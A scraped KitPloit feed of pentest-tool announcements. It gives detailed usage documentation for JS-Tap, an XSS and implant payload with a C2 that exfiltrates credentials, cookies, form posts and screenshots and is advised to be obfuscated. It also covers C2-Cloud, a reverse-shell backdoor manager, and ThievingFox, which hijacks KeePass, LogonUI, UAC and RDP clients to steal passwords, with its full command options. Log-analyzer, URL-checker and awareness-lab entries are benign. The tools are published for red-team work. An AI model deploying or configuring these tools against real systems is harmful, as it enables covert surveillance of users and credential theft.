      https://github.com/iamagarre/BadExclusionsNWBO/assets/89855208/46982975-f4a5-4894-b78d-8d6ed9b1c8c4



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      JS-Tap - JavaScript Payload And Supporting Software To Be Used As XSS Payload Or Post Exploitation Implant To Monitor Users As They Use The Targeted Application

      By: Zion3R β€” May 4th 2024 at 12:30


      JavaScript payload and supporting software to be used as XSS payload or post exploitation implant to monitor users as they use the targeted application. Also includes a C2 for executing custom JavaScript payloads in clients.


      Changelogs

      Major changes are documented in the project Announcements:
      https://github.com/hoodoer/JS-Tap/discussions/categories/announcements

      Demo

      You can read the original blog post about JS-Tap here:
      javascript-for-red-teams">https://trustedsec.com/blog/js-tap-weaponizing-javascript-for-red-teams

      Short demo from ShmooCon of JS-Tap version 1:
      https://youtu.be/IDLMMiqV6ss?si=XunvnVarqSIjx_x0&t=19814

      Demo of JS-Tap version 2 at HackSpaceCon, including C2 and how to use it as a post exploitation implant:
      https://youtu.be/aWvNLJnqObQ?t=11719

      A demo can also be seen in this webinar:
      https://youtu.be/-c3b5debhME?si=CtJRqpklov2xv7Um

      Upgrade warning

      I do not plan on creating migration scripts for the database, and version number bumps often involve database schema changes (check the changelogs). You should probably delete your jsTap.db database on version bumps. If you have custom payloads in your JS-Tap server, make sure you export them before the upgrade.

      Introduction

      JS-Tap is a generic JavaScript payload and supporting software to help red teamers attack webapps. The JS-Tap payload can be used as an XSS payload or as a post exploitation implant.

      The payload does not require the targeted user running the payload to be authenticated to the application being attacked, and it does not require any prior knowledge of the application beyond finding a way to get the JavaScript into the application.

      Instead of attacking the application server itself, JS-Tap focuses on the client-side of the application and heavily instruments the client-side code.

      The example JS-Tap payload is contained in the telemlib.js file in the payloads directory, however any file in this directory is served unauthenticated. Copy the telemlib.js file to whatever filename you wish and modify the configuration as needed. This file has not been obfuscated. Prior to using in an engagement strongly consider changing the naming of endpoints, stripping comments, and highly obfuscating the payload.

      Make sure you review the configuration section below carefully before using on a publicly exposed server.

      Data Collected

      • Client IP address, OS, Browser
      • User inputs (credentials, etc.)
      • URLs visited
      • Cookies (that don't have httponly flag set)
      • Local Storage
      • Session Storage
      • HTML code of pages visited (if feature enabled)
      • Screenshots of pages visited
      • Copy of Form Submissions
      • Copy of XHR API calls (if monkeypatch feature enabled)
        • Endpoint
        • Method (GET, POST, etc.)
        • Headers set
        • Request body and response body
      • Copy of Fetch API calls (if monkeypatch feature enabled)
        • Endpoint
        • Method (GET, POST, etc.)
        • Headers set
        • Request body and response body

      Note: ability to receive copies of XHR and Fetch API calls works in trap mode. In implant mode only Fetch API can be copied currently.

      Operating Modes

      The payload has two modes of operation. Whether the mode is trap or implant is set in the initGlobals() function, search for the window.taperMode variable.

      Trap Mode

      Trap mode is typically the mode you would use as a XSS payload. Execution of XSS payloads is often fleeting, the user viewing the page where the malicious JavaScript payload runs may close the browser tab (the page isn't interesting) or navigate elsewhere in the application. In both cases, the payload will be deleted from memory and stop working. JS-Tap needs to run a long time or you won't collect useful data.

      Trap mode combats this by establishing persistence using an iFrame trap technique. The JS-Tap payload will create a full page iFrame, and start the user elsewhere in the application. This starting page must be configured ahead of time. In the initGlobals() function search for the window.taperstartingPage variable and set it to an appropriate starting location in the target application.

      In trap mode JS-Tap monitors the location of the user in the iframe trap and it spoofs the address bar of the browser to match the location of the iframe.

      Note that the application targeted must allow iFraming from same-origin or self if it's setting CSP or X-Frame-Options headers. JavaScript based framebusters can also prevent iFrame traps from working.

      Note, I've had good luck using Trap Mode for a post exploitation implant in very specific locations of an application, or when I'm not sure what resources the application is using inside the authenticated section of the application. You can put an implant in the login page, with trap mode and the trap mode start page set to window.location.href (i.e. current location). The trap will set when the user visits the login page, and they'll hopefully contine into the authenticated portions of the application inside the iframe trap.

      A user refreshing the page will generally break/escape the iframe trap.

      Implant Mode

      Implant mode would typically be used if you're directly adding the payload into the targeted application. Perhaps you have a shell on the server that hosts the JavaScript files for the application. Add the payload to a JavaScript file that's used throughout the application (jQuery, main.js, etc.). Which file would be ideal really depends on the app in question and how it's using JavaScript files. Implant mode does not require a starting page to be configured, and does not use the iFrame trap technique.

      A user refreshing the page in implant mode will generally continue to run the JS-Tap payload.

      Installation and Start

      Requires python3. A large number of dependencies are required for the jsTapServer, you are highly encouraged to use python virtual environments to isolate the libraries for the server software (or whatever your preferred isolation method is).

      Example:

      mkdir jsTapEnvironment
      python3 -m venv jsTapEnvironment
      source jsTapEnvironment/bin/activate
      cd jsTapEnvironment
      git clone https://github.com/hoodoer/JS-Tap
      cd JS-Tap
      pip3 install -r requirements.txt

      run in debug/single thread mode:
      python3 jsTapServer.py

      run with gunicorn multithreaded (production use):
      ./jstapRun.sh

      A new admin password is generated on startup. If you didn't catch it in the startup print statements you can find the credentials saved to the adminCreds.txt file.

      If an existing database is found by jsTapServer on startup it will ask you if you want to keep existing clients in the database or drop those tables to start fresh.

      Note that on Mac I also had to install libmagic outside of python.

      brew install libmagic

      Playing with JS-Tap locally is fine, but to use in a proper engagment you'll need to be running JS-Tap on publicly accessible VPS and setup JS-Tap with PROXYMODE set to True. Use NGINX on the front end to handle a valid certificate.

      Configuration

      JS-Tap Server Configuration

      Debug/Single thread config

      If you're running JS-Tap with the jsTapServer.py script in single threaded mode (great for testing/demos) there are configuration options directly in the jsTapServer.py script.

      Proxy Mode

      For production use JS-Tap should be hosted on a publicly available server with a proper SSL certificate from someone like letsencrypt. The easiest way to deploy this is to allow NGINX to act as a front-end to JS-Tap and handle the letsencrypt cert, and then forward the decrypted traffic to JS-Tap as HTTP traffic locally (i.e. NGINX and JS-Tap run on the same VPS).

      If you set proxyMode to true, JS-Tap server will run in HTTP mode, and take the client IP address from the X-Forwarded-For header, which NGINX needs to be configured to set.

      When proxyMode is set to false, JS-Tap will run with a self-signed certificate, which is useful for testing. The client IP will be taken from the source IP of the client.

      Data Directory

      The dataDirectory parameter tells JS-Tap where the directory is to use for the SQLite database and loot directory. Not all "loot" is stored in the database, screenshots and scraped HTML files in particular are not.

      Server Port

      To change the server port configuration see the last line of jsTapServer.py

      app.run(debug=False, host='0.0.0.0', port=8444, ssl_context='adhoc')

      Gunicorn Production Configuration

      Gunicorn is the preferred means of running JS-Tap in production. The same settings mentioned above can be set in the jstapRun.sh bash script. Values set in the startup script take precedence over the values set directly in the jsTapServer.py script when JS-Tap is started with the gunicorn startup script.

      A big difference in configuration when using Gunicorn for serving the application is that you need to configure the number of workers (heavy weight processes) and threads (lightweight serving processes). JS-Tap is a very I/O heavy application, so using threads in addition to workers is beneficial in scaling up the application on multi-processor machines. Note that if you're using NGINX on the same box you need to configure NGNIX to also use multiple processes so you don't bottleneck on the proxy itself.

      At the top of the jstapRun.sh script are the numWorkers and numThreads parameters. I like to use number of CPUs + 1 for workers, and 4-8 threads depending on how beefy the processors are. For NGINX in its configuration I typically set worker_processes auto;

      Proxy Mode is set by the PROXYMODE variable, and the data directory with the DATADIRECTORY variable. Note the data directory variable needs a trailing '/' added.

      Using the gunicorn startup script will use a self-signed cert when started with PROXYMODE set to False. You need to generate that self-signed cert first with:
      openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

      telemlib.js Configuration

      These configuration variables are in the initGlobals() function.

      JS-Tap Server Location

      You need to configure the payload with the URL of the JS-Tap server it will connect back to.

      window.taperexfilServer = "https://127.0.0.1:8444";

      Mode

      Set to either trap or implant This is set with the variable:

      window.taperMode = "trap";
      or
      window.taperMode = "implant";

      Trap Mode Starting Page

      Only needed for trap mode. See explanation in Operating Modes section above.
      Sets the page the user starts on when the iFrame trap is set.

      window.taperstartingPage = "http://targetapp.com/somestartpage";

      If you want the trap to start on the current page, instead of redirecting the user to a different page in the iframe trap, you can use:

      window.taperstartingPage = window.location.href;

      Client Tag

      Useful if you're using JS-Tap against multiple applications or deployments at once and want a visual indicator of what payload was loaded. Remember that the entire /payloads directory is served, you can have multiple JS-Tap payloads configured with different modes, start pages, and clien tags.

      This tag string (keep it short!) is prepended to the client nickname in the JS-Tap portal. Setup multiple payloads, each with the appropriate configuration for the application its being used against, and add a tag indicating which app the client is running.

      window.taperTag = 'whatever';

      Custom Payload Tasks

      Used to set if clients are checking for Custom Payload tasks, and how often they're checking. The jitter settings Let you optionally set a floor and ceiling modifier. A random value between these two numbers will be picked and added to the check delay. Set these to 0 and 0 for no jitter.

      window.taperTaskCheck        = true;
      window.taperTaskCheckDelay = 5000;
      window.taperTaskJitterBottom = -2000;
      window.taperTaskJitterTop = 2000;

      Exfiltrate HTML

      true/false setting on whether a copy of the HTML code of each page viewed is exfiltrated.

      window.taperexfilHTML = true;

      Copy Form Submissions

      true/false setting on whether to intercept a copy of all form posts.

      window.taperexfilFormSubmissions = true;

      MonkeyPatch APIs

      Enable monkeypatching of XHR and Fetch APIs. This works in trap mode. In implant mode, only Fetch APIs are monkeypatched. Monkeypatching allows JavaScript to be rewritten at runtime. Enabling this feature will re-write the XHR and Fetch networking APIs used by JavaScript code in order to tap the contents of those network calls. Not that jQuery based network calls will be captured in the XHR API, which jQuery uses under the hood for network calls.

      window.monkeyPatchAPIs = true;

      Screenshot after API calls

      By default JS-Tap will capture a new screenshot after the user navigates to a new page. Some applications do not change their path when new data is loaded, which would cause missed screenshots. JS-Tap can be configured to capture a new screenshot after an XHR or Fetch API call is made. These API calls are often used to retrieve new data to display. Two settings are offered, one to enable the "after API call screenshot", and a delay in milliseconds. X milliseconds after the API call JS-Tap will capture the new screenshot.

      window.postApiCallScreenshot = true;
      window.screenshotDelay = 1000;

      JS-Tap Portal

      Login with the admin credentials provided by the server script on startup.

      Clients show up on the left, selecting one will show a time series of their events (loot) on the right.

      The clients list can be sorted by time (first seen, last update received) and the list can be filtered to only show the "starred" clients. There is also a quick filter search above the clients list that allows you to quickly filter clients that have the entered string. Useful if you set an optional tag in the payload configuration. Optional tags show up prepended to the client nickname.

      Each client has an 'x' button (near the star button). This allows you to delete the session for that client, if they're sending junk or useless data, you can prevent that client from submitting future data.

      When the JS-Tap payload starts, it retrieves a session from the JS-Tap server. If you want to stop all new client sessions from being issues, select Session Settings at the top and you can disable new client sessions. You can also block specific IP addresses from receiving a session in here.

      Each client has a "notes" feature. If you find juicy information for that particular client (credentials, API tokens, etc) you can add it to the client notes. After you've reviewed all your clients and made you notes, the View All Notes feature at the top allows you to export all notes from all clients at once.

      The events list can be filtered by event type if you're trying to focus on something specific, like screenshots. Note that the events/loot list does not automatically update (the clients list does). If you want to load the latest events for the client you need to select the client again on the left.

      Custom Payloads

      Starting in version 1.02 there is a custom payload feature. Multiple JavaScript payloads can be added in the JS-Tap portal and executed on a single client, all current clients, or set to autorun on all future clients. Payloads can be written/edited within the JS-Tap portal, or imported from a file. Payloads can also be exported. The format for importing payloads is simple JSON. The JavaScript code and description are simply base64 encoded.

      [{"code":"YWxlcnQoJ1BheWxvYWQgMSBmaXJpbmcnKTs=","description":"VGhlIGZpcnN0IHBheWxvYWQ=","name":"Payload 1"},{"code":"YWxlcnQoJ1BheWxvYWQgMiBmaXJpbmcnKTs=","description":"VGhlIHNlY29uZCBwYXlsb2Fk","name":"Payload 2"}]

      The main user interface for custom payloads is from the top menu bar. Select Custom Payloads to open the interface. Any existing payloads will be shown in a list on the left. The button bar allows you to import and export the list. Payloads can be edited on the right side. To load an existing payload for editing select the payload by clicking on it in the Saved Payloads list. Once you have payloads defined and saved, you can execute them on clients.

      In the main Custom Payloads view you can launch a payload against all current clients (the Run Payload button). You can also toggle on the Autorun attribute of a payload, which means that all new clients will run the payload. Note that existing clients will not run a payload based on the Autorun setting.

      You can toggle on Repeat Payload and the payload will be tasked for each client when they check for tasks. Remember, the rate that a client checks for custom payload tasks is variable, and that rate can be changed in the main JS-Tap payload configuration. That rate can be changed with a custom payload (calling the updateTaskCheckInterval(newDelay) function). The jitter in the task check delay can be set with the updateTaskCheckJitter(newTop, newBottom) function.

      The Clear All Jobs button in the custom payload UI will delete all custom payload jobs from the queue for all clients and resets the auto/repeat run toggles.

      To run a payload on a single client user the Run Payload button on the specific client you wish to run it on, and then hit the run button for the specific payload you wish to use. You can also set Repeat Payload on individual clients.

      Tools

      A few tools are included in the tools subdirectory.

      clientSimulator.py

      A script to stress test the jsTapServer. Good for determining roughly how many clients your server can handle. Note that running the clientSimulator script is probably more resource intensive than the actual jsTapServer, so you may wish to run it on a separate machine.

      At the top of the script is a numClients variable, set to how many clients you want to simulator. The script will spawn a thread for each, retrieve a client session, and send data in simulating a client.

      numClients = 50

      You'll also need to configure where you're running the jsTapServer for the clientSimulator to connect to:

      apiServer = "https://127.0.0.1:8444"

      JS-Tap run using gunicorn scales quite well.

      MonkeyPatchApp

      A simple app used for testing XHR/Fetch monkeypatching, but can give you a simple app to test the payload against in general.

      Run with:

      python3 monkeyPatchLab.py

      By default this will start the application running on:

      https://127.0.0.1:8443

      Pressing the "Inject JS-Tap payload" button will run the JS-Tap payload. This works for either implant or trap mode. You may need to point the monkeyPatchLab application at a new JS-Tap server location for loading the payload file, you can find this set in the injectPayload() function in main.js

      function injectPayload()
      {
      document.head.appendChild(Object.assign(document.createElement('script'),
      {src:'https://127.0.0.1:8444/lib/telemlib.js',type:'text/javascript'}));
      }

      formParser.py

      Abandoned tool, is a good start on analyzing HTML for forms and parsing out their parameters. Intended to help automatically generate JavaScript payloads to target form posts.

      You should be able to run it on exfiltrated HTML files. Again, this is currently abandonware.

      generateIntelReport.py

      No longer working, used before the web UI for JS-Tap. The generateIntelReport script would comb through the gathered loot and generate a PDF report. Saving all the loot to disk is now disabled for performance reasons, most of it is stored in the datagbase with the exception of exfiltratred HTML code and screenshots.

      Contact

      @hoodoer
      hoodoer@bitwisemunitions.dev



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      C2-Cloud - The C2 Cloud Is A Robust Web-Based C2 Framework, Designed To Simplify The Life Of Penetration Testers

      By: Zion3R β€” May 2nd 2024 at 12:30


      The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.

      C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.

      Reverse shells support:

      1. Reverse TCP
      2. Reverse HTTP
      3. Reverse HTTPS (configure it behind an LB)
      4. Telegram C2

      Demo

      C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
      Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
      Telegram C2: https://youtu.be/WLQtF4hbCKk

      Key Features

      πŸ”’ Anywhere Access: Reach the C2 Cloud from any location.
      πŸ”„ Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
      πŸ–±οΈ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
      πŸ“œ Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.

      Tech Stack

      πŸ› οΈ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
      πŸ”— TCP Socket: Serving reverse TCP requests for enhanced functionality.
      🌐 Nginx: Effortlessly routing traffic between web and backend systems.
      πŸ“¨ Redis PubSub: Serving as a robust message broker for seamless communication.
      πŸš€ Websockets: Delivering real-time updates to browser clients for enhanced user experience.
      πŸ’Ύ Postgres DB: Ensuring persistent storage for seamless continuity.

      Architecture

      Application setup

      • Management port: 9000
      • Reversse HTTP port: 8000
      • Reverse TCP port: 8888

      • Clone the repo

      • Optional: Update chait_id, bot_token in c2-telegram/config.yml
      • Execute docker-compose up -d to start the containers Note: The c2-api service will not start up until the database is initialized. If you receive 500 errors, please try after some time.

      Credits

      Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.

      License

      Distributed under the MIT License. See LICENSE for more information.

      Contact



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      OSTE-Web-Log-Analyzer - Automate The Process Of Analyzing Web Server Logs With The Python Web Log Analyzer

      By: Zion3R β€” May 1st 2024 at 12:30


      Automate the process of analyzing web server logs with the Python Web Log Analyzer. This powerful tool is designed to enhance security by identifying and detecting various types of cyber attacks within your server logs. Stay ahead of potential threats with features that include:


      Features

      1. Attack Detection: Identify and flag potential Cross-Site Scripting (XSS), Local File Inclusion (LFI), Remote File Inclusion (RFI), and other common web application attacks.

      2. Rate Limit Monitoring: Detect suspicious patterns in multiple requests made in a short time frame, helping to identify brute-force attacks or automated scanning tools.

      3. Automated Scanner Detection: Keep your web applications secure by identifying requests associated with known automated scanning tools or vulnerability scanners.

      4. User-Agent Analysis: Analyze and identify potentially malicious User-Agent strings, allowing you to spot unusual or suspicious behavior.

      Future Features

      This project is actively developed, and future features may include:

      1. IP Geolocation: Identify the geographic location of IP addresses in the logs.
      2. Real-time Monitoring: Implement real-time monitoring capabilities for immediate threat detection.

      Installation

      The tool only requires Python 3 at the moment.

      1. step1: git clone https://github.com/OSTEsayed/OSTE-Web-Log-Analyzer.git
      2. step2: cd OSTE-Web-Log-Analyzer
      3. step3: python3 WLA-cli.py

      Usage

      After cloning the repository to your local machine, you can initiate the application by executing the command python3 WLA-cli.py. simple usage example : python3 WLA-cli.py -l LogSampls/access.log -t

      use -h or --help for more detailed usage examples : python3 WLA-cli.py -h

      Contact

      linkdin:(https://www.linkedin.com/in/oudjani-seyyid-taqy-eddine-b964a5228)



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      ThievingFox - Remotely Retrieving Credentials From Password Managers And Windows Utilities

      By: Zion3R β€” April 30th 2024 at 12:30


      ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internals functions to gather crendentials.

      The accompanying blog post can be found here


      Installation

      Linux

      Rustup must be installed, follow the instructions available here : https://rustup.rs/

      The mingw-w64 package must be installed. On Debian, this can be done using :

      apt install mingw-w64

      Both x86 and x86_64 windows targets must be installed for Rust:

      rustup target add x86_64-pc-windows-gnu
      rustup target add i686-pc-windows-gnu

      Mono and Nuget must also be installed, instructions are available here : https://www.mono-project.com/download/stable/#download-lin

      After adding Mono repositories, Nuget can be installed using apt :

      apt install nuget

      Finally, python dependancies must be installed :

      pip install -r client/requirements.txt

      ThievingFox works with python >= 3.11.

      Windows

      Rustup must be installed, follow the instructions available here : https://rustup.rs/

      Both x86 and x86_64 windows targets must be installed for Rust:

      rustup target add x86_64-pc-windows-msvc
      rustup target add i686-pc-windows-msvc

      .NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"

      Finally, python dependancies must be installed :

      pip install -r client/requirements.txt

      ThievingFox works with python >= 3.11

      NOTE : On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developper Powershell (Tools > Command Line > Developper Powershell)

      Targets

      All modules have been tested on the following Windows versions :

      Windows Version
      Windows Server 2022
      Windows Server 2019
      Windows Server 2016
      Windows Server 2012R2
      Windows 10
      Windows 11

      [!CAUTION] Modules have not been tested on other version, and are expected to not work.

      Application Injection Method
      KeePass.exe AppDomainManager Injection
      KeePassXC.exe DLL Proxying
      LogonUI.exe (Windows Login Screen) COM Hijacking
      consent.exe (Windows UAC Popup) COM Hijacking
      mstsc.exe (Windows default RDP client) COM Hijacking
      RDCMan.exe (Sysinternals' RDP client) COM Hijacking
      MobaXTerm.exe (3rd party RDP client) COM Hijacking

      Usage

      [!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the cleanup module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.

      ThievingFox contains 3 main modules : poison, cleanup and collect.

      Poison

      For each application specified in the command line parameters, the poison module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that has matches the properties of the original DLL, uploads it to the server, and modify the registry if needed to perform COM hijacking.

      To speed up the process of compilation of all libraries, a cache is maintained in client/cache/.

      --mstsc, --rdcman, and --mobaxterm have a specific option, respectively --mstsc-poison-hkcr, --rdcman-poison-hkcr, and --mobaxterm-poison-hkcr. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR hive, meaning all users will be impacted. By default, only all currently logged in users are impacted (all users that have a HKCU hive).

      --keepass and --keepassxc have specific options, --keepass-path, --keepass-share, and --keepassxc-path, --keepassxc-share, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.

      The KeePass modules requires the Visual C++ Redistributable to be installed on the target.

      Multiple applications can be specified at once, or, the --all flag can be used to target all applications.

      [!IMPORTANT] Remember to clean the cache if you ever change the --tempdir parameter, since the directory name is embedded inside native DLLs.

      $ python3 client/ThievingFox.py poison -h
      usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
      [--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
      [--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
      target

      positional arguments:
      target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

      options:
      -h, --help show this help message and exit
      -hashes HASHES, --hashes HASHES
      LM:NT hash
      -aesKey AESKEY, --aesKey AESKEY
      AES key to use for Kerberos Authentication
      -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
      -dc-ip DC_IP, --dc-ip DC_IP
      IP Address of the domain controller
      -no-pass, --no-pass Do not prompt for password
      --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
      --keepass Try to poison KeePass.exe
      --keepass-path KEEPASS_PATH
      The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
      --keepass-share KEEPASS_SHARE
      The share on which KeePass is installed (Default: c$)
      --keepassxc Try to poison KeePassXC.exe
      --keepassxc-path KEEPASSXC_PATH
      The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
      --ke epassxc-share KEEPASSXC_SHARE
      The share on which KeePassXC is installed (Default: c$)
      --mstsc Try to poison mstsc.exe
      --mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
      logged in (Default: False)
      --consent Try to poison Consent.exe
      --logonui Try to poison LogonUI.exe
      --rdcman Try to poison RDCMan.exe
      --rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
      logged in (Default: False)
      --mobaxterm Try to poison MobaXTerm.exe
      --mobaxterm-poison-hkcr
      Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
      logged in (Default: False)
      --all Try to poison all applications

      Cleanup

      For each application specified in the command line parameters, the cleanup first removes poisonning artifacts that force the target application to load the hooking library. Then, it tries to delete the library that were uploaded to the remote host.

      For applications that support poisonning of both HKCU and HKCR hives, both are cleaned up regardless.

      Multiple applications can be specified at once, or, the --all flag can be used to cleanup all applications.

      It does not clean extracted credentials on the remote host.

      [!IMPORTANT] If the targeted application is in use while the cleanup module is ran, the DLL that are dropped on the target cannot be deleted. Nonetheless, the cleanup module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox are logged.

      $ python3 client/ThievingFox.py cleanup -h
      usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
      [--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
      [--rdcman] [--mobaxterm] [--all]
      target

      positional arguments:
      target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

      options:
      -h, --help show this help message and exit
      -hashes HASHES, --hashes HASHES
      LM:NT hash
      -aesKey AESKEY, --aesKey AESKEY
      AES key to use for Kerberos Authentication
      -k Use kerberos authentication. For LogonUI, mstsc and cons ent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
      -dc-ip DC_IP, --dc-ip DC_IP
      IP Address of the domain controller
      -no-pass, --no-pass Do not prompt for password
      --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
      --keepass Try to cleanup all poisonning artifacts related to KeePass.exe
      --keepass-share KEEPASS_SHARE
      The share on which KeePass is installed (Default: c$)
      --keepass-path KEEPASS_PATH
      The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
      --keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
      --keepassxc-path KEEPASSXC_PATH
      The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
      --keepassxc-share KEEPASSXC_SHARE
      The share on which KeePassXC is installed (Default: c$)
      --mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
      --consent Try to cleanup all poisonning artifacts related to Consent.exe
      --logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
      --rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
      --mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
      --all Try to cleanup all poisonning artifacts related to all applications

      Collect

      For each application specified on the command line parameters, the collect module retrieves output files on the remote host stored inside C:\Windows\Temp\<tempdir> corresponding to the application, and decrypts them. The files are deleted from the remote host, and retrieved data is stored in client/ouput/.

      Multiple applications can be specified at once, or, the --all flag can be used to collect logs from all applications.

      $ python3 client/ThievingFox.py collect -h
      usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
      [--logonui] [--rdcman] [--mobaxterm] [--all]
      target

      positional arguments:
      target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

      options:
      -h, --help show this help message and exit
      -hashes HASHES, --hashes HASHES
      LM:NT hash
      -aesKey AESKEY, --aesKey AESKEY
      AES key to use for Kerberos Authentication
      -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
      -dc-ip DC_IP, --dc-ip DC_IP
      IP Address of th e domain controller
      -no-pass, --no-pass Do not prompt for password
      --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
      --keepass Collect KeePass.exe logs
      --keepassxc Collect KeePassXC.exe logs
      --mstsc Collect mstsc.exe logs
      --consent Collect Consent.exe logs
      --logonui Collect LogonUI.exe logs
      --rdcman Collect RDCMan.exe logs
      --mobaxterm Collect MobaXTerm.exe logs
      --all Collect logs from all applications


      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Url-Status-Checker - Tool For Swiftly Checking The Status Of URLs

      By: Zion3R β€” April 27th 2024 at 16:55



      Status Checker is a Python script that checks the status of one or multiple URLs/domains and categorizes them based on their HTTP status codes. Version 1.0.0 Created BY BLACK-SCORP10 t.me/BLACK-SCORP10

      Features

      • Check the status of single or multiple URLs/domains.
      • Asynchronous HTTP requests for improved performance.
      • Color-coded output for better visualization of status codes.
      • Progress bar when checking multiple URLs.
      • Save results to an output file.
      • Error handling for inaccessible URLs and invalid responses.
      • Command-line interface for easy usage.

      Installation

      1. Clone the repository:

      bash git clone https://github.com/your_username/status-checker.git cd status-checker

      1. Install dependencies:

      bash pip install -r requirements.txt

      Usage

      python status_checker.py [-h] [-d DOMAIN] [-l LIST] [-o OUTPUT] [-v] [-update]
      • -d, --domain: Single domain/URL to check.
      • -l, --list: File containing a list of domains/URLs to check.
      • -o, --output: File to save the output.
      • -v, --version: Display version information.
      • -update: Update the tool.

      Example:

      python status_checker.py -l urls.txt -o results.txt

      Preview:

      License

      This project is licensed under the MIT License - see the LICENSE file for details.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      CSAF - Cyber Security Awareness Framework

      By: Zion3R β€” April 26th 2024 at 12:30

      The Cyber Security Awareness Framework (CSAF) is a structured approach aimed at enhancing Cybersecurity" title="Cybersecurity">cybersecurity awareness and understanding among individuals, organizations, and communities. It provides guidance for the development of effective Cybersecurity" title="Cybersecurity">cybersecurity awareness programs, covering key areas such as assessing awareness needs, creating educational m aterials, conducting training and simulations, implementing communication campaigns, and measuring awareness levels. By adopting this framework, organizations can foster a robust security culture, enhance their ability to detect and respond to cyber threats, and mitigate the risks associated with attacks and security breaches.


      Requirements

      Software

      • Docker
      • Docker-compose

      Hardware

      Minimum

      • 4 Core CPU
      • 10GB RAM
      • 60GB Disk free

      Recommendation

      • 8 Core CPU or above
      • 16GB RAM or above
      • 100GB Disk free or above

      Installation

      Clone the repository

      git clone https://github.com/csalab-id/csaf.git

      Navigate to the project directory

      cd csaf

      Pull the Docker images

      docker-compose --profile=all pull

      Generate wazuh ssl certificate

      docker-compose -f generate-indexer-certs.yml run --rm generator

      For security reason you should set env like this first

      export ATTACK_PASS=ChangeMePlease
      export DEFENSE_PASS=ChangeMePlease
      export MONITOR_PASS=ChangeMePlease
      export SPLUNK_PASS=ChangeMePlease
      export GOPHISH_PASS=ChangeMePlease
      export MAIL_PASS=ChangeMePlease
      export PURPLEOPS_PASS=ChangeMePlease

      Start all the containers

      docker-compose --profile=all up -d

      You can run specific profiles for running specific labs with the following profiles - all - attackdefenselab - phisinglab - breachlab - soclab

      For example

      docker-compose --profile=attackdefenselab up -d

      Proof



      Exposed Ports

      An exposed port can be accessed using a proxy socks5 client, SSH client, or HTTP client. Choose one for the best experience.

